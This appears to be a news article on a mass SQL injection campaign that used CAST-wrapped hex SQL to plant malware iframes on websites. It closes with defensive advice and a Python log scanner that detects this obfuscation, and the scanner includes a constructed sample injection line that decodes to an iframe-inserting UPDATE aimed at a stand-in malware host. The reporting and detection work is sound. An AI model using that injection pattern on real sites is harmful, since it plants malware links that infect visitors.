A new series of mass SQL injection attacks has planted links to malware sites and hidden iframes in over a million webpages, including parts of Apple's website. The technique is similar to a standard SQL injection attack, but uses obfuscation to disguise the data in hopes of routing around any rudimentary input checking.

The attack was detailed earlier this week by security researcher Manuel Humberto Santander Peláez. The attacks rely on a series of SQL commands stored as hexadecimal data preceded by a CAST command, so that the SQL is only recognizable once the database decodes it. When decoded, the payload attempts to inject iframes into data tables, and those iframes then end up rendered in webpages that build their HTML dynamically from the tables. The injected links point to Russian top-level domains that appear to be sources of malware.

While the attacks have affected mostly smaller sites that tend to invest less time in securing against attacks like SQL injection, The Register notes that even some Apple podcast pages succumbed to the attack. However, the links appear to have been removed since the attacks first started spreading earlier this month. Other pages affected include sites for a Pennsylvania county government, a UAE radio station, and a small book publisher.

"These attacks have been ongoing and are changing pretty often," Mary Landesman, a senior researcher with ScanSafe, told The Register. "It's not clear whether these are the work of the same attackers or are competing attacks."

Peláez notes that SQL injection is something every site should be protecting against. Web developers should sanitize input to make sure it carries no valid SQL commands, use predefined stored procedures rather than dynamically built queries so that injected SQL is useless, limit database permissions, and avoid disclosing database errors that attackers could use to find other weaknesses.
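As an added illustration, not code from the article or from the researchers it cites, the following Python scanner looks for the CAST-plus-hex obfuscation described above in web access logs and decodes the hidden SQL, the kind of check that complements the input sanitization recommended here. The log lines, the payload and the marker list are all constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Matches CAST(0x<hex> AS <char type>): the SQL that a keyword filter should
# catch is hidden as a hex literal that the database decodes for the attacker.
CAST_HEX_RE = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.IGNORECASE
)

# Substrings that mark a decoded payload as an injection attempt (assumed list).
SUSPICIOUS_MARKERS = ("<iframe", "<script", "update ", "declare ", "exec(")


def decode_cast_hex(hex_blob: str) -> str:
    """Decode the hex literal as the database would. NUL bytes are stripped so a
    UTF-16LE (nvarchar) payload reads the same as a plain varchar one."""
    raw = bytes.fromhex(hex_blob).replace(b"\x00", b"")
    return raw.decode("latin-1")


def scan_request(line: str) -> Optional[dict]:
    """Inspect one access-log line. Returns None when no CAST(0x..) is present,
    otherwise a finding with the decoded payload and the markers it matched."""
    text = unquote_plus(line)  # the query string arrives URL-encoded
    match = CAST_HEX_RE.search(text)
    if match is None:
        return None
    payload = decode_cast_hex(match.group(1))
    markers = [m for m in SUSPICIOUS_MARKERS if m in payload.lower()]
    return {"hex_len": len(match.group(1)), "payload": payload, "markers": markers}


def scan_log(lines) -> list:
    """Run scan_request over every line and keep only the hits."""
    return [hit for hit in map(scan_request, lines) if hit is not None]


# Constructed sample traffic (not real attack data). The hex blob is generated
# here from FAKE_PAYLOAD so the reader can see exactly what it decodes to.
FAKE_PAYLOAD = "update pages set body=body+'<iframe src=http://malware.invalid/></iframe>'"
SAMPLE_LOG = [
    "GET /catalog.asp?id=42 HTTP/1.1",
    "GET /catalog.asp?id=42;declare+@s+varchar(255);set+@s=cast(0x"
    + FAKE_PAYLOAD.encode("latin-1").hex()
    + "+as+varchar(255));exec(@s);-- HTTP/1.1",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```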